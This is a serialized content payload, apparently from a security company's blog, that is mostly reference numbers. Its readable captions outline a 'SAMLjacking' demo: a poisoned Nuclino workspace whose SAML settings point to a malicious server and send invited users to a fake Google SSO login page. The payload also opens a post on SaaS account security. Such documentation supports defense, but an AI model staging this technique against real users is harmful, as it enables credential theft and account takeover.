173,"value":268357,"marks":295567,"data":295568},[],{},{"nodeType":178,"data":295570,"content":295571},{},[295572],{"nodeType":173,"value":268364,"marks":295573,"data":295574},[],{},{"nodeType":178,"data":295576,"content":295577},{},[295578],{"nodeType":173,"value":268371,"marks":295579,"data":295580},[],{},{"nodeType":235,"data":295582,"content":295583},{},[295584],{"nodeType":173,"value":268378,"marks":295585,"data":295586},[],{},{"nodeType":178,"data":295588,"content":295589},{},[295590],{"nodeType":173,"value":268385,"marks":295591,"data":295592},[],{},{"nodeType":312,"data":295594,"content":295597},{"target":295595},{"sys":295596},{"id":268392,"type":317,"linkType":318},[],{"nodeType":178,"data":295599,"content":295600},{},[295601,295604,295611],{"nodeType":173,"value":268398,"marks":295602,"data":295603},[],{},{"nodeType":186,"data":295605,"content":295606},{"uri":259860},[295607],{"nodeType":173,"value":259866,"marks":295608,"data":295610},[295609],{"type":194},{},{"nodeType":173,"value":268409,"marks":295612,"data":295613},[],{},{"nodeType":178,"data":295615,"content":295616},{},[295617,295620,295627],{"nodeType":173,"value":268416,"marks":295618,"data":295619},[],{},{"nodeType":186,"data":295621,"content":295622},{"uri":197917},[295623],{"nodeType":173,"value":268423,"marks":295624,"data":295626},[295625],{"type":194},{},{"nodeType":173,"value":268428,"marks":295628,"data":295629},[],{},{"nodeType":178,"data":295631,"content":295632},{},[295633],{"nodeType":173,"value":268435,"marks":295634,"data":295635},[],{},{"nodeType":312,"data":295637,"content":295640},{"target":295638},{"sys":295639},{"id":268442,"type":317,"linkType":318},[],{"nodeType":312,"data":295642,"content":295645},{"target":295643},{"sys":295644},{"id":268448,"type":317,"linkType":318},[],{"nodeType":178,"data":295647,"content":295648},{},[295649],{"nodeType":173,"value":268454,"marks":295650,"data":295651},[],{},{"nodeType":235,"data":295653,"content":295654},{},[295655],{"nodeType":173,"value":268461,"marks":295656,"data":295657},[],{},{"nodeType":178,"data":295659,"content":295660},{},[295661],{"nodeType":173,"value":268468,"marks":295662,"data":295663},[],{},{"nodeType":178,"data":295665,"content":295666},{},[295667],{"nodeType":173,"value":268475,"marks":295668,"data":295669},[],{},{"nodeType":250,"data":295671,"content":295672},{},[295673,295682],{"nodeType":254,"data":295674,"content":295675},{},[295676],{"nodeType":178,"data":295677,"content":295678},{},[295679],{"nodeType":173,"value":268488,"marks":295680,"data":295681},[],{},{"nodeType":254,"data":295683,"content":295684},{},[295685],{"nodeType":178,"data":295686,"content":295687},{},[295688],{"nodeType":173,"value":268498,"marks":295689,"data":295690},[],{},{"nodeType":312,"data":295692,"content":295695},{"target":295693},{"sys":295694},{"id":268505,"type":317,"linkType":318},[],{"nodeType":312,"data":295697,"content":295700},{"target":295698},{"sys":295699},{"id":268511,"type":317,"linkType":318},[],{"nodeType":178,"data":295702,"content":295703},{},[295704],{"nodeType":173,"value":268517,"marks":295705,"data":295706},[],{},{"nodeType":178,"data":295708,"content":295709},{},[295710],{"nodeType":173,"value":268524,"marks":295711,"data":295712},[],{},{"nodeType":178,"data":295714,"content":295715},{},[295716],{"nodeType":173,"value":268531,"marks":295717,"data":295718},[],{},{"nodeType":178,"data":295720,"content":295721},{},[295722,295725],{"nodeType":173,"value":268538,"marks":295723,"data":295724},[],{},{"nodeType":173,"value":10557,"marks":295726,"data":295728},[295727],{"type":1646},{},{"nodeType":312,"data":295730,"content":295733},{"target":295731},{"sys":295732},{"id":268549,"type":317,"linkType":318},[],{"nodeType":178,"data":295735,"content":295736},{},[295737],{"nodeType":173,"value":268555,"marks":295738,"data":295739},[],{},{"nodeType":312,"data":295741,"content":295744},{"target":295742},{"sys":295743},{"id":268562,"type":317,"linkType":318},[],{"nodeType":312,"data":295746,"content":295749},{"target":295747},{"sys":295748},{"id":268568,"type":317,"linkType":318},[],{"nodeType":178,"data":295751,"content":295752},{},[295753],{"nodeType":173,"value":268574,"marks":295754,"data":295755},[],{},{"nodeType":169,"data":295757,"content":295758},{},[295759],{"nodeType":173,"value":268581,"marks":295760,"data":295761},[],{},{"nodeType":178,"data":295763,"content":295764},{},[295765],{"nodeType":173,"value":268588,"marks":295766,"data":295767},[],{},{"nodeType":312,"data":295769,"content":295772},{"target":295770},{"sys":295771},{"id":268595,"type":317,"linkType":318},[],{"nodeType":312,"data":295774,"content":295777},{"target":295775},{"sys":295776},{"id":268601,"type":317,"linkType":318},[],{"nodeType":169,"data":295779,"content":295780},{},[295781],{"nodeType":173,"value":15539,"marks":295782,"data":295783},[],{},{"nodeType":178,"data":295785,"content":295786},{},[295787],{"nodeType":173,"value":268613,"marks":295788,"data":295789},[],{},{"nodeType":250,"data":295791,"content":295792},{},[295793,295802,295811,295820,295829,295877,295886],{"nodeType":254,"data":295794,"content":295795},{},[295796],{"nodeType":178,"data":295797,"content":295798},{},[295799],{"nodeType":173,"value":268626,"marks":295800,"data":295801},[],{},{"nodeType":254,"data":295803,"content":295804},{},[295805],{"nodeType":178,"data":295806,"content":295807},{},[295808],{"nodeType":173,"value":268636,"marks":295809,"data":295810},[],{},{"nodeType":254,"data":295812,"content":295813},{},[295814],{"nodeType":178,"data":295815,"content":295816},{},[295817],{"nodeType":173,"value":268646,"marks":295818,"data":295819},[],{},{"nodeType":254,"data":295821,"content":295822},{},[295823],{"nodeType":178,"data":295824,"content":295825},{},[295826],{"nodeType":173,"value":268656,"marks":295827,"data":295828},[],{},{"nodeType":254,"data":295830,"content":295831},{},[295832,295838],{"nodeType":178,"data":295833,"content":295834},{},[295835],{"nodeType":173,"value":268666,"marks":295836,"data":295837},[],{},{"nodeType":250,"data":295839,"content":295840},{},[295841,295850,295859,295868],{"nodeType":254,"data":295842,"content":295843},{},[295844],{"nodeType":178,"data":295845,"content":295846},{},[295847],{"nodeType":173,"value":268679,"marks":295848,"data":295849},[],{},{"nodeType":254,"data":295851,"content":295852},{},[295853],{"nodeType":178,"data":295854,"content":295855},{},[295856],{"nodeType":173,"value":268689,"marks":295857,"data":295858},[],{},{"nodeType":254,"data":295860,"content":295861},{},[295862],{"nodeType":178,"data":295863,"content":295864},{},[295865],{"nodeType":173,"value":268699,"marks":295866,"data":295867},[],{},{"nodeType":254,"data":295869,"content":295870},{},[295871],{"nodeType":178,"data":295872,"content":295873},{},[295874],{"nodeType":173,"value":268709,"marks":295875,"data":295876},[],{},{"nodeType":254,"data":295878,"content":295879},{},[295880],{"nodeType":178,"data":295881,"content":295882},{},[295883],{"nodeType":173,"value":268719,"marks":295884,"data":295885},[],{},{"nodeType":254,"data":295887,"content":295888},{},[295889],{"nodeType":178,"data":295890,"content":295891},{},[295892],{"nodeType":173,"value":268729,"marks":295893,"data":295894},[],{},{"nodeType":169,"data":295896,"content":295897},{},[295898],{"nodeType":173,"value":40632,"marks":295899,"data":295900},[],{},{"nodeType":178,"data":295902,"content":295903},{},[295904],{"nodeType":173,"value":268742,"marks":295905,"data":295906},[],{},{"nodeType":178,"data":295908,"content":295909},{},[295910],{"nodeType":173,"value":268749,"marks":295911,"data":295912},[],{},{"items":295914},[295915,295917],{"sys":295916,"name":505},{"id":504},{"sys":295918,"name":509},{"id":508},{"items":295920},[295921],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":295922},{"url":8615},{"__typename":1528,"sys":295924,"content":295925,"title":277468,"synopsis":289734,"hashTags":118,"publishedDate":289735,"slug":277469,"tagsCollection":296297,"authorsCollection":296301},{"id":276988},{"json":295926},{"nodeType":165,"data":295927,"content":295928},{},[295929,295935,295941,295947,295953,295959,295964,295970,295976,295982,295988,295993,295999,296004,296021,296027,296032,296049,296066,296081,296087,296093,296099,296105,296110,296115,296121,296127,296133,296139,296144,296150,296192,296197,296202,296218,296223,296229,296234,296240,296245,296251,296257,296262,296267,296273,296279,296285,296291],{"nodeType":178,"data":295930,"content":295931},{},[295932],{"nodeType":173,"value":289311,"marks":295933,"data":295934},[],{},{"nodeType":178,"data":295936,"content":295937},{},[295938],{"nodeType":173,"value":289318,"marks":295939,"data":295940},[],{},{"nodeType":169,"data":295942,"content":295943},{},[295944],{"nodeType":173,"value":289325,"marks":295945,"data":295946},[],{},{"nodeType":178,"data":295948,"content":295949},{},[295950],{"nodeType":173,"value":289332,"marks":295951,"data":295952},[],{},{"nodeType":178,"data":295954,"content":295955},{},[295956],{"nodeType":173,"value":289339,"marks":295957,"data":295958},[],{},{"nodeType":312,"data":295960,"content":295963},{"target":295961},{"sys":295962},{"id":289346,"type":317,"linkType":318},[],{"nodeType":178,"data":295965,"content":295966},{},[295967],{"nodeType":173,"value":289352,"marks":295968,"data":295969},[],{},{"nodeType":178,"data":295971,"content":295972},{},[295973],{"nodeType":173,"value":289359,"marks":295974,"data":295975},[],{},{"nodeType":178,"data":295977,"content":295978},{},[295979],{"nodeType":173,"value":289366,"marks":295980,"data":295981},[],{},{"nodeType":235,"data":295983,"content":295984},{},[295985],{"nodeType":173,"value":289373,"marks":295986,"data":295987},[],{},{"nodeType":312,"data":295989,"content":295992},{"target":295990},{"sys":295991},{"id":289380,"type":317,"linkType":318},[],{"nodeType":178,"data":295994,"content":295995},{},[295996],{"nodeType":173,"value":289386,"marks":295997,"data":295998},[],{},{"nodeType":312,"data":296000,"content":296003},{"target":296001},{"sys":296002},{"id":289393,"type":317,"linkType":318},[],{"nodeType":178,"data":296005,"content":296006},{},[296007,296010,296018],{"nodeType":173,"value":289399,"marks":296008,"data":296009},[],{},{"nodeType":1698,"data":296011,"content":296014},{"target":296012},{"sys":296013},{"id":289406,"type":317,"linkType":318},[296015],{"nodeType":173,"value":155323,"marks":296016,"data":296017},[],{},{"nodeType":173,"value":1477,"marks":296019,"data":296020},[],{},{"nodeType":235,"data":296022,"content":296023},{},[296024],{"nodeType":173,"value":289418,"marks":296025,"data":296026},[],{},{"nodeType":312,"data":296028,"content":296031},{"target":296029},{"sys":296030},{"id":289425,"type":317,"linkType":318},[],{"nodeType":178,"data":296033,"content":296034},{},[296035,296038,296046],{"nodeType":173,"value":289431,"marks":296036,"data":296037},[],{},{"nodeType":1698,"data":296039,"content":296042},{"target":296040},{"sys":296041},{"id":269483,"type":317,"linkType":318},[296043],{"nodeType":173,"value":155323,"marks":296044,"data":296045},[],{},{"nodeType":173,"value":197,"marks":296047,"data":296048},[],{},{"nodeType":178,"data":296050,"content":296051},{},[296052,296055,296063],{"nodeType":173,"value":289449,"marks":296053,"data":296054},[],{},{"nodeType":1698,"data":296056,"content":296059},{"target":296057},{"sys":296058},{"id":269414,"type":317,"linkType":318},[296060],{"nodeType":173,"value":8091,"marks":296061,"data":296062},[],{},{"nodeType":173,"value":289461,"marks":296064,"data":296065},[],{},{"nodeType":178,"data":296067,"content":296068},{},[296069,296072,296078],{"nodeType":173,"value":289468,"marks":296070,"data":296071},[],{},{"nodeType":186,"data":296073,"content":296074},{"uri":289473},[296075],{"nodeType":173,"value":289476,"marks":296076,"data":296077},[],{},{"nodeType":173,"value":289480,"marks":296079,"data":296080},[],{},{"nodeType":235,"data":296082,"content":296083},{},[296084],{"nodeType":173,"value":289487,"marks":296085,"data":296086},[],{},{"nodeType":178,"data":296088,"content":296089},{},[296090],{"nodeType":173,"value":289494,"marks":296091,"data":296092},[],{},{"nodeType":178,"data":296094,"content":296095},{},[296096],{"nodeType":173,"value":289501,"marks":296097,"data":296098},[],{},{"nodeType":178,"data":296100,"content":296101},{},[296102],{"nodeType":173,"value":289508,"marks":296103,"data":296104},[],{},{"nodeType":312,"data":296106,"content":296109},{"target":296107},{"sys":296108},{"id":289515,"type":317,"linkType":318},[],{"nodeType":312,"data":296111,"content":296114},{"target":296112},{"sys":296113},{"id":289521,"type":317,"linkType":318},[],{"nodeType":235,"data":296116,"content":296117},{},[296118],{"nodeType":173,"value":289527,"marks":296119,"data":296120},[],{},{"nodeType":178,"data":296122,"content":296123},{},[296124],{"nodeType":173,"value":289534,"marks":296125,"data":296126},[],{},{"nodeType":178,"data":296128,"content":296129},{},[296130],{"nodeType":173,"value":289541,"marks":296131,"data":296132},[],{},{"nodeType":178,"data":296134,"content":296135},{},[296136],{"nodeType":173,"value":289548,"marks":296137,"data":296138},[],{},{"nodeType":312,"data":296140,"content":296143},{"target":296141},{"sys":296142},{"id":289555,"type":317,"linkType":318},[],{"nodeType":178,"data":296145,"content":296146},{},[296147],{"nodeType":173,"value":289561,"marks":296148,"data":296149},[],{},{"nodeType":250,"data":296151,"content":296152},{},[296153,296166,296179],{"nodeType":254,"data":296154,"content":296155},{},[296156],{"nodeType":178,"data":296157,"content":296158},{},[296159,296163],{"nodeType":173,"value":289574,"marks":296160,"data":296162},[296161],{"type":370},{},{"nodeType":173,"value":289579,"marks":296164,"data":296165},[],{},{"nodeType":254,"data":296167,"content":296168},{},[296169],{"nodeType":178,"data":296170,"content":296171},{},[296172,296176],{"nodeType":173,"value":289589,"marks":296173,"data":296175},[296174],{"type":370},{},{"nodeType":173,"value":289594,"marks":296177,"data":296178},[],{},{"nodeType":254,"data":296180,"content":296181},{},[296182],{"nodeType":178,"data":296183,"content":296184},{},[296185,296189],{"nodeType":173,"value":289604,"marks":296186,"data":296188},[296187],{"type":370},{},{"nodeType":173,"value":289609,"marks":296190,"data":296191},[],{},{"nodeType":312,"data":296193,"content":296196},{"target":296194},{"sys":296195},{"id":289616,"type":317,"linkType":318},[],{"nodeType":312,"data":296198,"content":296201},{"target":296199},{"sys":296200},{"id":289622,"type":317,"linkType":318},[],{"nodeType":250,"data":296203,"content":296204},{},[296205],{"nodeType":254,"data":296206,"content":296207},{},[296208],{"nodeType":178,"data":296209,"content":296210},{},[296211,296215],{"nodeType":173,"value":289634,"marks":296212,"data":296214},[296213],{"type":370},{},{"nodeType":173,"value":289639,"marks":296216,"data":296217},[],{},{"nodeType":312,"data":296219,"content":296222},{"target":296220},{"sys":296221},{"id":289646,"type":317,"linkType":318},[],{"nodeType":178,"data":296224,"content":296225},{},[296226],{"nodeType":173,"value":289652,"marks":296227,"data":296228},[],{},{"nodeType":312,"data":296230,"content":296233},{"target":296231},{"sys":296232},{"id":289659,"type":317,"linkType":318},[],{"nodeType":235,"data":296235,"content":296236},{},[296237],{"nodeType":173,"value":289665,"marks":296238,"data":296239},[],{},{"nodeType":312,"data":296241,"content":296244},{"target":296242},{"sys":296243},{"id":289672,"type":317,"linkType":318},[],{"nodeType":178,"data":296246,"content":296247},{},[296248],{"nodeType":173,"value":289678,"marks":296249,"data":296250},[],{},{"nodeType":178,"data":296252,"content":296253},{},[296254],{"nodeType":173,"value":289685,"marks":296255,"data":296256},[],{},{"nodeType":312,"data":296258,"content":296261},{"target":296259},{"sys":296260},{"id":289692,"type":317,"linkType":318},[],{"nodeType":312,"data":296263,"content":296266},{"target":296264},{"sys":296265},{"id":289698,"type":317,"linkType":318},[],{"nodeType":235,"data":296268,"content":296269},{},[296270],{"nodeType":173,"value":40632,"marks":296271,"data":296272},[],{},{"nodeType":178,"data":296274,"content":296275},{},[296276],{"nodeType":173,"value":289710,"marks":296277,"data":296278},[],{},{"nodeType":178,"data":296280,"content":296281},{},[296282],{"nodeType":173,"value":289717,"marks":296283,"data":296284},[],{},{"nodeType":178,"data":296286,"content":296287},{},[296288],{"nodeType":173,"value":289724,"marks":296289,"data":296290},[],{},{"nodeType":178,"data":296292,"content":296293},{},[296294],{"nodeType":173,"value":289731,"marks":296295,"data":296296},[],{},{"items":296298},[296299],{"sys":296300,"name":505},{"id":504},{"items":296302},[296303],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":296304},{"url":8615},{"items":296306},[296307],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":296308},{"url":8615},{"json":296310,"links":296703},{"data":296311,"content":296312,"nodeType":165},{},[296313,296329,296335,296341,296347,296363,296369,296385,296391,296397,296403,296409,296415,296421,296427,296443,296449,296455,296460,296466,296472,296478,296483,296488,296493,296499,296505,296510,296516,296522,296528,296533,296539,296545,296551,296557,296563,296568,296574,296580,296585,296591,296597,296602,296608,296614,296673,296679,296685,296691,296697],{"data":296314,"content":296315,"nodeType":178},{},[296316,296319,296326],{"data":296317,"marks":296318,"value":259462,"nodeType":173},{},[],{"data":296320,"content":296321,"nodeType":186},{"uri":88239},[296322],{"data":296323,"marks":296324,"value":88742,"nodeType":173},{},[296325],{"type":194},{"data":296327,"marks":296328,"value":259473,"nodeType":173},{},[],{"data":296330,"content":296331,"nodeType":178},{},[296332],{"data":296333,"marks":296334,"value":259480,"nodeType":173},{},[],{"data":296336,"content":296337,"nodeType":178},{},[296338],{"data":296339,"marks":296340,"value":259487,"nodeType":173},{},[],{"data":296342,"content":296343,"nodeType":169},{},[296344],{"data":296345,"marks":296346,"value":227960,"nodeType":173},{},[],{"data":296348,"content":296349,"nodeType":178},{},[296350,296353,296360],{"data":296351,"marks":296352,"value":37,"nodeType":173},{},[],{"data":296354,"content":296355,"nodeType":186},{"uri":208521},[296356],{"data":296357,"marks":296358,"value":227973,"nodeType":173},{},[296359],{"type":194},{"data":296361,"marks":296362,"value":227977,"nodeType":173},{},[],{"data":296364,"content":296365,"nodeType":169},{},[296366],{"data":296367,"marks":296368,"value":259516,"nodeType":173},{},[],{"data":296370,"content":296371,"nodeType":178},{},[296372,296375,296382],{"data":296373,"marks":296374,"value":37,"nodeType":173},{},[],{"data":296376,"content":296377,"nodeType":186},{"uri":63250},[296378],{"data":296379,"marks":296380,"value":63256,"nodeType":173},{},[296381],{"type":194},{"data":296383,"marks":296384,"value":259533,"nodeType":173},{},[],{"data":296386,"content":296387,"nodeType":169},{},[296388],{"data":296389,"marks":296390,"value":259540,"nodeType":173},{},[],{"data":296392,"content":296393,"nodeType":178},{},[296394],{"data":296395,"marks":296396,"value":259547,"nodeType":173},{},[],{"data":296398,"content":296399,"nodeType":178},{},[296400],{"data":296401,"marks":296402,"value":259554,"nodeType":173},{},[],{"data":296404,"content":296405,"nodeType":178},{},[296406],{"data":296407,"marks":296408,"value":259561,"nodeType":173},{},[],{"data":296410,"content":296411,"nodeType":178},{},[296412],{"data":296413,"marks":296414,"value":259568,"nodeType":173},{},[],{"data":296416,"content":296417,"nodeType":178},{},[296418],{"data":296419,"marks":296420,"value":259575,"nodeType":173},{},[],{"data":296422,"content":296423,"nodeType":169},{},[296424],{"data":296425,"marks":296426,"value":259582,"nodeType":173},{},[],{"data":296428,"content":296429,"nodeType":178},{},[296430,296433,296440],{"data":296431,"marks":296432,"value":259589,"nodeType":173},{},[],{"data":296434,"content":296435,"nodeType":186},{"uri":259592},[296436],{"data":296437,"marks":296438,"value":259598,"nodeType":173},{},[296439],{"type":194},{"data":296441,"marks":296442,"value":259602,"nodeType":173},{},[],{"data":296444,"content":296445,"nodeType":178},{},[296446],{"data":296447,"marks":296448,"value":259609,"nodeType":173},{},[],{"data":296450,"content":296451,"nodeType":178},{},[296452],{"data":296453,"marks":296454,"value":259616,"nodeType":173},{},[],{"data":296456,"content":296459,"nodeType":312},{"target":296457},{"sys":296458},{"id":259621,"type":317,"linkType":318},[],{"data":296461,"content":296462,"nodeType":178},{},[296463],{"data":296464,"marks":296465,"value":259629,"nodeType":173},{},[],{"data":296467,"content":296468,"nodeType":235},{},[296469],{"data":296470,"marks":296471,"value":259636,"nodeType":173},{},[],{"data":296473,"content":296474,"nodeType":178},{},[296475],{"data":296476,"marks":296477,"value":259643,"nodeType":173},{},[],{"data":296479,"content":296482,"nodeType":312},{"target":296480},{"sys":296481},{"id":259648,"type":317,"linkType":318},[],{"data":296484,"content":296487,"nodeType":312},{"target":296485},{"sys":296486},{"id":259654,"type":317,"linkType":318},[],{"data":296489,"content":296492,"nodeType":312},{"target":296490},{"sys":296491},{"id":259660,"type":317,"linkType":318},[],{"data":296494,"content":296495,"nodeType":235},{},[296496],{"data":296497,"marks":296498,"value":259668,"nodeType":173},{},[],{"data":296500,"content":296501,"nodeType":178},{},[296502],{"data":296503,"marks":296504,"value":259675,"nodeType":173},{},[],{"data":296506,"content":296509,"nodeType":312},{"target":296507},{"sys":296508},{"id":259680,"type":317,"linkType":318},[],{"data":296511,"content":296512,"nodeType":235},{},[296513],{"data":296514,"marks":296515,"value":259688,"nodeType":173},{},[],{"data":296517,"content":296518,"nodeType":178},{},[296519],{"data":296520,"marks":296521,"value":259695,"nodeType":173},{},[],{"data":296523,"content":296524,"nodeType":178},{},[296525],{"data":296526,"marks":296527,"value":259702,"nodeType":173},{},[],{"data":296529,"content":296532,"nodeType":312},{"target":296530},{"sys":296531},{"id":259707,"type":317,"linkType":318},[],{"data":296534,"content":296535,"nodeType":178},{},[296536],{"data":296537,"marks":296538,"value":259715,"nodeType":173},{},[],{"data":296540,"content":296541,"nodeType":169},{},[296542],{"data":296543,"marks":296544,"value":259722,"nodeType":173},{},[],{"data":296546,"content":296547,"nodeType":235},{},[296548],{"data":296549,"marks":296550,"value":259729,"nodeType":173},{},[],{"data":296552,"content":296553,"nodeType":178},{},[296554],{"data":296555,"marks":296556,"value":259736,"nodeType":173},{},[],{"data":296558,"content":296559,"nodeType":178},{},[296560],{"data":296561,"marks":296562,"value":259743,"nodeType":173},{},[],{"data":296564,"content":296567,"nodeType":312},{"target":296565},{"sys":296566},{"id":259748,"type":317,"linkType":318},[],{"data":296569,"content":296570,"nodeType":235},{},[296571],{"data":296572,"marks":296573,"value":259756,"nodeType":173},{},[],{"data":296575,"content":296576,"nodeType":178},{},[296577],{"data":296578,"marks":296579,"value":259763,"nodeType":173},{},[],{"data":296581,"content":296584,"nodeType":312},{"target":296582},{"sys":296583},{"id":259768,"type":317,"linkType":318},[],{"data":296586,"content":296587,"nodeType":178},{},[296588],{"data":296589,"marks":296590,"value":259776,"nodeType":173},{},[],{"data":296592,"content":296593,"nodeType":178},{},[296594],{"data":296595,"marks":296596,"value":259783,"nodeType":173},{},[],{"data":296598,"content":296601,"nodeType":312},{"target":296599},{"sys":296600},{"id":259788,"type":317,"linkType":318},[],{"data":296603,"content":296604,"nodeType":169},{},[296605],{"data":296606,"marks":296607,"value":15539,"nodeType":173},{},[],{"data":296609,"content":296610,"nodeType":178},{},[296611],{"data":296612,"marks":296613,"value":259802,"nodeType":173},{},[],{"data":296615,"content":296616,"nodeType":250},{},[296617,296626,296635,296654],{"data":296618,"content":296619,"nodeType":254},{},[296620],{"data":296621,"content":296622,"nodeType":178},{},[296623],{"data":296624,"marks":296625,"value":259815,"nodeType":173},{},[],{"data":296627,"content":296628,"nodeType":254},{},[296629],{"data":296630,"content":296631,"nodeType":178},{},[296632],{"data":296633,"marks":296634,"value":259825,"nodeType":173},{},[],{"data":296636,"content":296637,"nodeType":254},{},[296638],{"data":296639,"content":296640,"nodeType":178},{},[296641,296644,296651],{"data":296642,"marks":296643,"value":259835,"nodeType":173},{},[],{"data":296645,"content":296646,"nodeType":186},{"uri":259838},[296647],{"data":296648,"marks":296649,"value":259844,"nodeType":173},{},[296650],{"type":194},{"data":296652,"marks":296653,"value":37,"nodeType":173},{},[],{"data":296655,"content":296656,"nodeType":254},{},[296657],{"data":296658,"content":296659,"nodeType":178},{},[296660,296663,296670],{"data":296661,"marks":296662,"value":259857,"nodeType":173},{},[],{"data":296664,"content":296665,"nodeType":186},{"uri":259860},[296666],{"data":296667,"marks":296668,"value":259866,"nodeType":173},{},[296669],{"type":194},{"data":296671,"marks":296672,"value":37,"nodeType":173},{},[],{"data":296674,"content":296675,"nodeType":178},{},[296676],{"data":296677,"marks":296678,"value":259876,"nodeType":173},{},[],{"data":296680,"content":296681,"nodeType":235},{},[296682],{"data":296683,"marks":296684,"value":40632,"nodeType":173},{},[],{"data":296686,"content":296687,"nodeType":178},{},[296688],{"data":296689,"marks":296690,"value":259889,"nodeType":173},{},[],{"data":296692,"content":296693,"nodeType":178},{},[296694],{"data":296695,"marks":296696,"value":259896,"nodeType":173},{},[],{"data":296698,"content":296699,"nodeType":178},{},[296700],{"data":296701,"marks":296702,"value":259903,"nodeType":173},{},[],{"entries":296704},{"hyperlink":296705,"inline":296706,"block":296707},[],[],[296708,296716,296724,296731,296737,296745,296753,296760,296767],{"sys":296709,"__typename":127689,"title":296710,"youTubeUrl":296711,"imagePlaceholder":296712},{"id":259621}," SAMLjacking a poisoned tenant demo","https://youtu.be/4gAeSxbycXU",{"url":296713,"width":296714,"height":296715},"https://images.ctfassets.net/y1cdw1ablpvd/4FbsSA4V25lkk95JLiezSx/600a821e26d50927a1467ee8075445eb/Screenshot_2023-08-17_at_12.20.11_PM.png",1976,992,{"sys":296717,"__typename":5345,"title":296718,"caption":296719,"layoutMode":118,"file":296720},{"id":259648},"Nuclino team invite","Sharing link method of inviting new users  ",{"url":296721,"width":296722,"height":296723},"https://images.ctfassets.net/y1cdw1ablpvd/10AKFD5hMvE2PYWZ3LaulV/f323a8614df7a1c4f65f4207a5acc6a6/image8.png",1158,656,{"sys":296725,"__typename":5345,"title":296726,"caption":296727,"layoutMode":118,"file":296728},{"id":259654},"Nuclino email invite"," Email invite method of inviting new users",{"url":296729,"width":296730,"height":286460},"https://images.ctfassets.net/y1cdw1ablpvd/hqwOoJ3oacQLReve31WOU/ac949d7c0c440fba6e5bc382afce3e62/image3.png",1152,{"sys":296732,"__typename":5345,"title":296733,"caption":296734,"layoutMode":118,"file":296735},{"id":259660},"Nuclino legit email invite","Example legit email a target user will receive from Nuclino when invited to join a workspace",{"url":296736,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/2jPY0vvPllYE7A5mkZqQSc/9eb51364f71b9f4b0e1011214df7c4ac/image2.png",{"sys":296738,"__typename":5345,"title":296739,"caption":296740,"layoutMode":118,"file":296741},{"id":259680},"Nuclino account creation poisoned tenant","Account creation process the target user is prompted with on joining the workspace",{"url":296742,"width":296743,"height":296744},"https://images.ctfassets.net/y1cdw1ablpvd/2mOASAKuRVDJBG9Kxj49gT/63cc74501f0b68a093a179fe9181b40c/image7.png",507,599,{"sys":296746,"__typename":5345,"title":296747,"caption":296748,"layoutMode":118,"file":296749},{"id":259707},"Nuclino custom SAML settings","Custom SAML server settings pointing to a malicious SAML server",{"url":296750,"width":296751,"height":296752},"https://images.ctfassets.net/y1cdw1ablpvd/6ruhgorFea9H78bVp94Ux/558f3d93c65410580607f16048520820/image1.png",1524,828,{"sys":296754,"__typename":5345,"title":296755,"caption":296756,"layoutMode":118,"file":296757},{"id":259748},"Nuclino legit SSO linking email","SSO linking email sent by Nuclino to existing users",{"url":296758,"width":296759,"height":46407},"https://images.ctfassets.net/y1cdw1ablpvd/5joyiKTydkVP0754d1qlgi/5d036ae41c778f4d0f4f38bb539f91e4/image5.png",1516,{"sys":296761,"__typename":5345,"title":296762,"caption":296762,"layoutMode":118,"file":296763},{"id":259768},"Workspace login page post SSO configuration",{"url":296764,"width":296765,"height":296766},"https://images.ctfassets.net/y1cdw1ablpvd/1z3d7ItA95c1zDcXC4ufQa/d76037c7502ae405443c9824408f3ed2/image4.png",403,462,{"sys":296768,"__typename":5345,"title":296769,"caption":296769,"layoutMode":118,"file":296770},{"id":259788},"Fake Google SSO login page the target user is redirected to",{"url":296771,"width":296772,"height":129893},"https://images.ctfassets.net/y1cdw1ablpvd/OqmMgyW9UVuvu6NI31mYQ/22b2de1e4ab8d4a48a6b239ce00186dd/image6.png",673,"content:blog:samljacking-a-poisoned-tenant.json","blog/samljacking-a-poisoned-tenant.json","blog/samljacking-a-poisoned-tenant",{"_path":296777,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":296778,"ogImage":118,"summary":296780,"title":284281,"subtitle":118,"metaTitle":296791,"synopsis":284282,"hashTags":118,"publishedDate":284283,"slug":284284,"tagsCollection":296792,"relatedBlogPostsCollection":296798,"authorsCollection":298101,"content":298105,"_id":298923,"_type":5439,"_source":5440,"_file":298924,"_stem":298925,"_extension":5439},"/blog/focus-on-account-security-to-reduce-saas-risks",{"id":273726,"publishedAt":296779},"2025-01-15T14:29:18.579Z",{"json":296781},{"data":296782,"content":296783,"nodeType":165},{},[296784],{"data":296785,"content":296786,"nodeType":178},{},[296787],{"data":296788,"marks":296789,"value":296790,"nodeType":173},{},[],"You’ve probably locked down the known cloud services your company is using, but what about all those other SaaS apps people in the company are using? ","Reduce SaaS risks by focusing on account security",{"items":296793},[296794,296796],{"sys":296795,"name":26133},{"id":26132},{"sys":296797,"name":26137},{"id":26136},{"items":296799},[296800,297430],{"__typename":1528,"sys":296801,"content":296802,"title":297416,"synopsis":297417,"hashTags":118,"publishedDate":297418,"slug":297419,"tagsCollection":297420,"authorsCollection":297426},{"id":283466},{"json":296803},{"nodeType":165,"data":296804,"content":296805},{},[296806,296818,296825,296832,296839,296846,296874,296881,296900,296907,296926,296933,296939,297077,297084,297091,297098,297150,297157,297176,297183,297190,297197,297204,297211,297218,297225,297232,297239,297246,297253,297260,297284,297291,297298,297305,297312,297319,297326,297333,297340,297347,297354,297361,297368,297375,297382,297389,297392,297399,297402,297409],{"nodeType":178,"data":296807,"content":296808},{},[296809,296813],{"nodeType":173,"value":296810,"marks":296811,"data":296812},"SaaS is exploding and making employees more productive than ever. If your security strategy relies on simply blocking all SaaS that hasn’t been sanctioned by your security team, you’re also blocking your coworkers from all the productivity gains that SaaS brings to the table. Not only that, but blocking through official channels doesn’t effectively stop employees from accessing the SaaS apps they want to use – you just can’t see it because they may have turned off the endpoint agent you’re using to manage SaaS policies, bypass the proxy, or change proxy settings. And now you’ve got a “Shadow IT problem!” *",[],{},{"nodeType":173,"value":296814,"marks":296815,"data":296817},"Dread ensues*",[296816],{"type":1646},{},{"nodeType":178,"data":296819,"content":296820},{},[296821],{"nodeType":173,"value":296822,"marks":296823,"data":296824},"Some folks even choose to block or turn off app stores to limit SaaS adoption by employees. The issue with this is that you’re blocking them from using productivity tools they want to do their work. You think you’re preventing risk (though we know employees find ways to adopt and use SaaS regardless of your controls), but you’re also restricting employees from being productive, flexible, and, frankly, you’re ticking them 